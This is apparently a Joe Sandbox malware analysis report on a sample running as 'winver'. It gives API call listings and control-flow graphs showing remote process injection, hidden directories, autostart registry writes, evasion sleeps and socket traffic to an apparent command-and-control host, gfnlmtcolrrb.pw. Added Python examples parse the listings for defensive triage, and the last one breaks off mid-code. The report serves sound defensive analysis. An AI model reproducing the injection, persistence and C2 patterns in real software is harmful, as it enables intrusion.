                                                                                                                                                                  • Part of subcall function 03390811: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 0339089D
                                                                                                                                                                  • Part of subcall function 03390811: RegCloseKey.KERNELBASE(?), ref: 033908A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile$AttributesDirectory$Close$AllocHandleLibraryLoadMutexPointerSleepValueVirtualWritelstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2311107590-0
                                                                                                                                                                • Opcode ID: 451ba8cbc3e38f52fb34ef88b6eecd67ee371e55e986b10a197f4978837e6b94
                                                                                                                                                                • Instruction ID: 95386665ed867fd216894fd17775bafcb19295b5e394f4a09591ff93e549b058
                                                                                                                                                                • Opcode Fuzzy Hash: 451ba8cbc3e38f52fb34ef88b6eecd67ee371e55e986b10a197f4978837e6b94
                                                                                                                                                                • Instruction Fuzzy Hash: B65131B2504714AFEF16AB60CC88FAA77BCEF44704F05049ABB85EF045DE705650CAA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%
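
The API listings above are the raw material of the report's verdicts: the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence at 03390E06-03390E70 is the remote-injection triad, SetFileAttributesA with 00000002 marks the freshly created directories FILE_ATTRIBUTE_HIDDEN, Sleep(000A012C) waits roughly eleven minutes, and RegCreateKeyExA / RegSetValueExA write the value the "autostart registry key" signature refers to. The following Python is an added example written for this page, not part of the Joe Sandbox report or its IDA plugin: it parses lines in the report's own format, decodes the Win32 constants the sandbox prints as bare hex, and flags those behaviours. The sample input is copied from the listings above; the 60-second long-sleep threshold, the 1 MiB allocation threshold, and the three-call lookahead window for the triad are assumptions chosen for this example.

```python
import re
from dataclasses import dataclass

# Constants from the Win32 headers (winnt.h / memoryapi.h / fileapi.h).
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
PAGE_EXECUTE_MASK = 0xF0          # any PAGE_EXECUTE_* protection
FILE_ATTRIBUTE_HIDDEN = 0x02
LONG_SLEEP_MS = 60_000            # assumption: sleeps this long are treated as timeout evasion
LARGE_ALLOC = 0x100000            # assumption: 1 MiB in-process buffers are worth noting

# Sample input copied from the report's API listings above.
REPORT_LINES = """\
• VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,03390D88,00000000,0000090B,00000000), ref: 03390E06
• WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 03390E24
• CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000), ref: 03390E70
  • Part of subcall function 0339067C: Sleep.KERNELBASE(00001388), ref: 033906FE
  • Part of subcall function 0339067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
  • Part of subcall function 0339067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
• VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 0339296F
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
  • Part of subcall function 03390811: RegCreateKeyExA.KERNELBASE(00000000,03390840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 03390876
  • Part of subcall function 03390811: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 0339089D
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str
    args: list      # int per argument, or None where the sandbox printed '?'
    ref: int        # address of the call instruction in the memory dump


def parse_calls(text):
    """Parse report-style API lines; values are hex, '-' prefixes are kept as negatives."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a.strip(), 16)
                for a in m["args"].split(",") if a.strip()]
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def describe_protect(flags):
    return PAGE_PROTECT.get(flags, f"0x{flags:X}")


def triage(text):
    """Return (ref, description) pairs for the behaviours a reviewer would want called out."""
    calls = parse_calls(text)
    findings = []
    for i, c in enumerate(calls):
        a = c.args
        if c.api == "VirtualAllocEx" and len(a) >= 5 and a[4] is not None and a[4] & PAGE_EXECUTE_MASK:
            # Remote-injection triad: executable allocation in another process,
            # a write of (ideally) the same size, then a thread started on it.
            window = calls[i + 1:i + 4]
            wpm = next((x for x in window if x.api == "WriteProcessMemory"), None)
            if wpm and any(x.api == "CreateRemoteThread" for x in window):
                same_size = len(wpm.args) >= 4 and wpm.args[3] == a[2]
                findings.append((c.ref, f"remote injection: VirtualAllocEx size=0x{a[2]:X} "
                                        f"{describe_protect(a[4])} -> WriteProcessMemory"
                                        f"{' (same size)' if same_size else ''} -> CreateRemoteThread"))
        elif c.api == "SetFileAttributesA" and len(a) >= 2 and a[1] is not None and a[1] & FILE_ATTRIBUTE_HIDDEN:
            findings.append((c.ref, "path marked FILE_ATTRIBUTE_HIDDEN"))
        elif c.api == "Sleep" and a and a[0] is not None and a[0] >= LONG_SLEEP_MS:
            findings.append((c.ref, f"long sleep: {a[0]} ms (~{a[0] / 60000:.1f} min), "
                                    "possible sandbox timeout evasion"))
        elif c.api == "VirtualAlloc" and len(a) >= 4 and a[1] is not None and a[1] >= LARGE_ALLOC:
            findings.append((c.ref, f"large in-process allocation: 0x{a[1]:X} bytes "
                                    f"{describe_protect(a[3])}"))
        elif c.api == "RegSetValueExA":
            findings.append((c.ref, "registry value written (key and value names are not recovered "
                                    "from the listing; see the dropped-files and registry sections)"))
    return findings


if __name__ == "__main__":
    for ref, text in triage(REPORT_LINES):
        print(f"{ref:08X}  {text}")
```

Two reading rules make this reliable on sandbox output: only index into the documented parameter positions of each API, because the sandbox prints whatever sits on the stack beyond the real argument count (the twelve values after VirtualAllocEx and the fifteen after Sleep are residue, not parameters), and treat '?' as "not recovered" rather than zero. The injection finding is strengthened by the matching 0x4F37 size in VirtualAllocEx and WriteProcessMemory, which is the detail that distinguishes a real payload copy from unrelated allocations.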

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE(03390673,00000009,?,00000000), ref: 03390681
                                                                                                                                                                  • Part of subcall function 03390C9C: GetProcAddress.KERNEL32(03392811,0339290A), ref: 03390CA9
                                                                                                                                                                  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
                                                                                                                                                                  • Part of subcall function 033906C2: lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
                                                                                                                                                                  • Part of subcall function 033906C2: Sleep.KERNELBASE(00001388), ref: 033906FE
                                                                                                                                                                  • Part of subcall function 033906C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
                                                                                                                                                                  • Part of subcall function 033906C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
                                                                                                                                                                  • Part of subcall function 033906C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
                                                                                                                                                                  • Part of subcall function 033906C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
                                                                                                                                                                  • Part of subcall function 033906C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
                                                                                                                                                                  • Part of subcall function 033906C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390797
                                                                                                                                                                  • Part of subcall function 033906C2: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 033907AB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateDirectoryFile$AddressAllocLibraryLoadProcSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2102637170-0
                                                                                                                                                                • Opcode ID: a8df3cce69ca11ad82ae1c349e259599bdf06f4bf77717782c4d553f26b560ae
                                                                                                                                                                • Instruction ID: ec8398b071f4515d20d387dfb5cda8ee23503b99091b7ffb9b3aa5101b432d85
                                                                                                                                                                • Opcode Fuzzy Hash: a8df3cce69ca11ad82ae1c349e259599bdf06f4bf77717782c4d553f26b560ae
                                                                                                                                                                • Instruction Fuzzy Hash: F04103B2504714AFEF16AB60CCC8BAA77BCEF44700F45049AA785EF055DE709690CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 033906FE
                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
                                                                                                                                                                  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390797
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 033907AB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateDirectoryFile$AllocSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2015199959-0
                                                                                                                                                                • Opcode ID: f9599e8adb29c5ebd1ea761d138e7f3780641abcf38f742bfd3d2987c2fe3e42
                                                                                                                                                                • Instruction ID: f7998f2ead70fc34796130a022800e4365d5d0b7bc868ee2fd5ec962ca7c8e77
                                                                                                                                                                • Opcode Fuzzy Hash: f9599e8adb29c5ebd1ea761d138e7f3780641abcf38f742bfd3d2987c2fe3e42
                                                                                                                                                                • Instruction Fuzzy Hash: 5531F1B2500614AFEF16AB60CCC8BAA73BCEF44744F45049EB785EF045DE709680CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
• lstrcat.KERNEL32(00000000,0339299D), ref: 033929AC
  • Part of subcall function 033929DD: lstrcat.KERNEL32(00000000,033929D4), ref: 033929E3
  • Part of subcall function 033929DD: lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
  • Part of subcall function 033929DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
  • Part of subcall function 033929DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: ea24b2d0948a46e09ffe2e34872151d6fffd848d6adfcb06e5263f1eabd84507
• Instruction ID: 55b9549200e354d718bcec4e3dac00ae64e5ae0a0dfeba9942d2dcac3be53569
• Opcode Fuzzy Hash: ea24b2d0948a46e09ffe2e34872151d6fffd848d6adfcb06e5263f1eabd84507
• Instruction Fuzzy Hash: 9C412676801718EEEF22EB61CDC4BAB77BCEF40705F044897AA45EA011DE749680CEA1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 203 3392f3f-3392f7e call 3393653 call 3393673 lstrlen call 3393673 call 3392f88 213 3392fad-3392feb call 339363b 203->213 214 3392f80-3392f83 203->214 215 3392fee-3392ffc send 213->215 214->215 216 3392f86 214->216 219 3392ffe 215->219 220 3393042-3393054 closesocket 215->220 216->213 222 3393001-3393015 send 219->222 222->220 223 3393017-339301c 222->223 223->222 224 339301e-3393023 223->224 225 3393026-3393038 recv 224->225 225->220 226 339303a-339303e 225->226 226->225 227 3393040 226->227 227->220
APIs
• lstrlen.KERNEL32(gfnlmtcolrrb.pw,00000000,03392F2E,00000011,?,00000000,00000011,00000000,/EiDQjNbWEQ/,00000000), ref: 03392F53
  • Part of subcall function 03392F88: send.WS2_32(?,00000000,00000000,00000000), ref: 03392FF4
  • Part of subcall function 03392F88: send.WS2_32(?,03392A30,03392A2C,00000000), ref: 0339300D
  • Part of subcall function 03392F88: recv.WS2_32(?,03392A30,00A00000,00000000), ref: 03393030
  • Part of subcall function 03392F88: closesocket.WS2_32(?), ref: 0339304A
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: send$closesocketlstrlenrecv
• String ID: gfnlmtcolrrb.pw
• API String ID: 1577144637-1614117810
• Opcode ID: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
• Instruction ID: 60795fe64d14d6c349aa60739f59cb3592a2b0ee7f1b05195e95e623fe29fbed
• Opcode Fuzzy Hash: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
• Instruction Fuzzy Hash: 9B21D576A00114FBFF129E24CC84F9A7BE8EF44754F084196FE09EF155D7359A108BA4
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 228 3390ce8-3390cfd 229 3390d03-3390d10 CreateToolhelp32Snapshot 228->229 229->229 230 3390d12-3390d45 Sleep Process32First 229->230 231 3390db5-3390ddb FindCloseChangeNotification Sleep 230->231 232 3390d47-3390d53 230->232 231->229 233 3390d54-3390d63 232->233 234 3390d8e-3390da6 Process32Next 233->234 235 3390d65-3390d7a 233->235 234->231 236 3390da8-3390daa 234->236 235->234 239 3390d7c-3390d88 call 3390de0 FindCloseChangeNotification 235->239 236->233 238 3390dac-3390db3 236->238 238->233 239->234
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03390D07
• Sleep.KERNELBASE(000003E8), ref: 03390D1D
• Process32First.KERNEL32(?,00000000), ref: 03390D3D
• FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 03390D88
• Process32Next.KERNEL32(?,?), ref: 03390D9E
• FindCloseChangeNotification.KERNELBASE(?), ref: 03390DCA
• Sleep.KERNELBASE(000003E8), ref: 03390DD5
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextSnapshotToolhelp32
• String ID:
• API String ID: 1902139912-0
• Opcode ID: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
• Instruction ID: 16dfc279058c1190d120e73408589ffc03444f013b20e19f23a6e862c8318b20
• Opcode Fuzzy Hash: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
• Instruction Fuzzy Hash: 3D217135901218EBFF269F54CC94BE9B7B9AF08740F0801DAE919FA1A5CB305A90CF55
Uniqueness
• Uniqueness Score: -1.00%
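Added example, not part of the Joe Sandbox report and not code from the sample: the control_flow_graph line above is a flattened graph. Each decimal token opens a basic block, the token right after it is the block's address (a start-end range, or a single address for one-instruction blocks), any further words are the API calls or call targets inside that block, and N->M tokens are edges. The Python below parses that notation and marks the blocks that lie on a cycle, which is how to confirm from the report alone that CreateToolhelp32Snapshot, Sleep (0x3E8, 1000 ms), Process32First and Process32Next run inside a polling loop rather than once: edge 229->229 retries the snapshot, edge 231->229 restarts the whole scan after the Sleep. The token rules are inferred from the lines on this page, the sample graph is the 3390ce8 line copied verbatim, and the reading of the two FindCloseChangeNotification entries as CloseHandle on the snapshot handle (both names resolve to the same KERNELBASE address) is this example's assumption, not something the report states.

```python
import re
from collections import defaultdict

# Constructed sample: the control_flow_graph line of function 3390ce8, copied
# verbatim from the report entry above.
CFG_LINE = (
    "control_flow_graph 228 3390ce8-3390cfd 229 3390d03-3390d10 CreateToolhelp32Snapshot "
    "228->229 229->229 230 3390d12-3390d45 Sleep Process32First 229->230 "
    "231 3390db5-3390ddb FindCloseChangeNotification Sleep 230->231 "
    "232 3390d47-3390d53 230->232 231->229 233 3390d54-3390d63 232->233 "
    "234 3390d8e-3390da6 Process32Next 233->234 235 3390d65-3390d7a 233->235 "
    "234->231 236 3390da8-3390daa 234->236 235->234 "
    "239 3390d7c-3390d88 call 3390de0 FindCloseChangeNotification 235->239 "
    "236->233 238 3390dac-3390db3 236->238 238->233 239->234"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
# a block address: "start-end", or a single address for one-instruction blocks
HEXADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


def parse_cfg(line):
    """Parse a Joe Sandbox control_flow_graph line into (nodes, edges).

    Token rules (inferred from the report, an assumption of this example):
    a decimal token opens a node, the token right after it is the block
    address, "N->M" is an edge, "call X" and bare API names are labels."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif current is not None and nodes[current]["addr"] is None and HEXADDR.match(tok):
            # checked before NODE_ID: a single address such as "3393040" is all digits
            nodes[current]["addr"] = tok
        elif NODE_ID.match(tok):
            current = int(tok)
            nodes[current] = {"addr": None, "labels": []}
        elif current is None:
            pass  # stray token before the first node
        elif tok == "call" and i + 1 < len(tokens):
            # keep "call 3393653" together; the target could otherwise look like a node id
            nodes[current]["labels"].append("call " + tokens[i + 1])
            i += 1
        else:
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges


def nodes_in_cycles(nodes, edges):
    """Node ids that lie on a cycle: a node is looped iff it can reach itself
    through at least one edge (depth-first search from its successors)."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    looped = set()
    for n in nodes:
        stack, seen = list(succ[n]), set()
        while stack:
            cur = stack.pop()
            if cur == n:
                looped.add(n)
                break
            if cur not in seen:
                seen.add(cur)
                stack.extend(succ[cur])
    return looped


def loop_labels(line):
    """API names and call targets that execute inside a loop of the graph."""
    nodes, edges = parse_cfg(line)
    labels = []
    for n in sorted(nodes_in_cycles(nodes, edges)):
        labels.extend(nodes[n]["labels"])
    return labels


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_LINE)
    print(f"{len(nodes)} blocks, {len(edges)} edges")
    print("inside a loop:", loop_labels(CFG_LINE))
```

Only block 228 (the function prologue) sits outside the loop; every block that touches the snapshot, Process32First/Next or Sleep is on a cycle, so the function is a one-second poller that keeps scanning the process list until whatever 3390de0 is looking for appears. The same parser works on the other graphs on this page, including blocks whose single address is all digits.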

Control-flow Graph
control_flow_graph 242 339261c-339262a call 3393653 ExpandEnvironmentStringsA 245 339262c 242->245 246 3392636-3392640 242->246 247 3392634 245->247 248 339262f call 3392597 245->248 249 339266c-3392679 lstrcat 246->249 250 3392642-339265b call 339265e 246->250 251 339267f-3392680 247->251 248->247 249->251 254 33926b9-33926c6 250->254 255 339265d-3392666 lstrcat 250->255 256 33926e9-33926f6 CloseHandle 254->256 257 33926c8-33926e3 ReadFile 254->257 255->249 257->256 258 33926e5-33926e6 257->258 258->256
APIs
• ExpandEnvironmentStringsA.KERNEL32(0339260C,00000010,?,?,0339298A,00000104), ref: 03392621
• lstrcat.KERNEL32(0339298A,03392659), ref: 03392666
• lstrcat.KERNEL32(0339298A,0339298A), ref: 03392679
  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: lstrcat$EnvironmentExpandStrings
• String ID: \AC\
• API String ID: 2903145849-1749977576
• Opcode ID: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
• Instruction ID: 9db000ec688731e0cd26892cd1dc539b2b1922b7304f511ec4c4c5bfbb5c1e7a
• Opcode Fuzzy Hash: 1a1455d68d8f3bd8c3de392b281e5d27977fe7010f103cb395b91df9d1250492
• Instruction Fuzzy Hash: 7A111971500948FFEF02DF60CC89EAEBBB8EF11744F1844AAE945EE021D7718A51DB95
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 260 33929dd-3392a1a call 3393653 lstrcat call 3392501 call 3392a14 call 3393653 lstrcat 270 3392a20-3392a2b call 3392b4d 260->270 272 3392a30-3392a43 call 33934f7 270->272 274 3392a48-3392a4f 272->274 274->270 275 3392a51-3392a6d call 339343f call 3392683 274->275 280 3392a9a-3392ab1 call 3392683 275->280 281 3392a6f 275->281 286 3392ade-3392af5 call 3392683 280->286 287 3392ab3 280->287 281->280 282 3392a71-3392a86 call 33926f9 281->282 282->280 291 3392a88 282->291 296 3392af8-3392b11 call 3392e97 286->296 297 3392af7 286->297 287->286 289 3392ab5-3392aca call 33926f9 287->289 289->286 298 3392acc 289->298 291->280 294 3392a8a-3392a94 DeleteFileA 291->294 294->280 302 3392b13-3392b1c call 3393057 296->302 303 3392b34-3392b48 Sleep 296->303 297->296 298->286 300 3392ace-3392ad8 DeleteFileA 298->300 300->286 302->303 306 3392b1e-3392b2e DeleteFileA 302->306 303->274 306->303
APIs
• lstrcat.KERNEL32(00000000,033929D4), ref: 033929E3
  • Part of subcall function 03392A14: lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
  • Part of subcall function 03392A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
  • Part of subcall function 03392A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
  • Part of subcall function 03392A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
  • Part of subcall function 03392A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 7f63560f243963457db3ff63725a4164d9a7c5e5f62613537768b102b2fc6caa
• Instruction ID: 0aae8976832be2c1f5dd80a4f40b5fe40a9e3a07ca68ab337cb716a98034006f
• Opcode Fuzzy Hash: 7f63560f243963457db3ff63725a4164d9a7c5e5f62613537768b102b2fc6caa
• Instruction Fuzzy Hash: 6C41367680171CEEEF22EB61CDC4BAB76FCEF40705F054897A945EA051DE749580CEA0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 327 3392f38-3392f3b 328 3392f3d 327->328 329 3392fb1-3392ffc call 339363b send 327->329 328->329 333 3392ffe 329->333 334 3393042-3393054 closesocket 329->334 335 3393001-3393015 send 333->335 335->334 336 3393017-339301c 335->336 336->335 337 339301e-3393023 336->337 338 3393026-3393038 recv 337->338 338->334 339 339303a-339303e 338->339 339->338 340 3393040 339->340 340->334
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 03392FF4
• send.WS2_32(?,03392A30,03392A2C,00000000), ref: 0339300D
• recv.WS2_32(?,03392A30,00A00000,00000000), ref: 03393030
• closesocket.WS2_32(?), ref: 0339304A
Memory Dump Source
• Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3390000_winver.jbxd
Similarity
• API ID: send$closesocketrecv
• String ID: gfnlmtcolrrb.pw
• API String ID: 3431254638-1614117810
• Opcode ID: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
• Instruction ID: b812975e2401362ab2df58f66e8f07df07af5f52e45ecf44ac7da1324a549e38
• Opcode Fuzzy Hash: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
• Instruction Fuzzy Hash: 83118176B00014EBEF129E28CC84B967BF8EF44794F0941D5FF09EA115E335E9108BA4
Uniqueness
• Uniqueness Score: -1.00%
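Added example, not part of the Joe Sandbox report and not the sample's code: a Python parser for the API-call lines used throughout these entries (the lstrlen/send/recv/closesocket calls of functions 3392f3f and 3392f88, the CreateToolhelp32Snapshot and Sleep calls of 3390ce8, and the Sleep call of the 33929dd DeleteFileA loop). It splits each line into API, module, argument list, subcall address and reference address, then pulls out what a responder wants from this report: the hostname gfnlmtcolrrb.pw and the URI path /EiDQjNbWEQ/ that are passed to lstrlen right before the send/recv subcall, the Sleep durations decoded from their hexadecimal argument (0x3E8 is 1000 ms in the process-enumeration loop, 0xA012C is 655660 ms, roughly 10.9 minutes, in the file-deletion loop), and the snapshot flag 0x2 (TH32CS_SNAPPROCESS). The sample lines are copied from the report into the block; the hostname and URL-path heuristics are this example's own assumptions, not something the report states.

```python
import re

# Constructed sample input: API-call lines copied verbatim from the report
# entries for functions 3392f3f / 3392f88 (the send/recv routine), 3390ce8
# (process enumeration) and 33929dd (the DeleteFileA/Sleep loop).
SAMPLE_LINES = [
    "• lstrlen.KERNEL32(gfnlmtcolrrb.pw,00000000,03392F2E,00000011,?,00000000,00000011,00000000,/EiDQjNbWEQ/,00000000), ref: 03392F53",
    "  • Part of subcall function 03392F88: send.WS2_32(?,00000000,00000000,00000000), ref: 03392FF4",
    "  • Part of subcall function 03392F88: recv.WS2_32(?,03392A30,00A00000,00000000), ref: 03393030",
    "  • Part of subcall function 03392F88: closesocket.WS2_32(?), ref: 0339304A",
    "• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03390D07",
    "• Sleep.KERNELBASE(000003E8), ref: 03390D1D",
    "• Sleep.KERNEL32(000A012C,00000000,00000000), ref: 03392B42",
    "Strings",  # a section header, not a call line: must be skipped
]

# One call line: optional bullet, optional "Part of subcall function X: ",
# then API.MODULE(arg,arg,...), ref: ADDRESS
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")  # every numeric argument is printed as 8 hex digits
# assumption of this example: a dotted label ending in an alphabetic TLD is a hostname
DOMAIN = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}$", re.I)


def parse_call(line):
    """Split one Joe Sandbox API-call line into its fields; None for non-call lines."""
    m = CALL_RE.match(line)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") else []
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": args,
        "ref": int(m.group("ref"), 16),
        "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def extract_iocs(lines):
    """Collect network indicators and decoded timing/flag constants from call lines."""
    iocs = {"domains": set(), "url_paths": set(), "sleep_ms": [],
            "net_apis": [], "snapshot_flags": []}
    for line in lines:
        call = parse_call(line)
        if call is None:
            continue
        for arg in call["args"]:
            if arg == "?" or HEX_ARG.match(arg):
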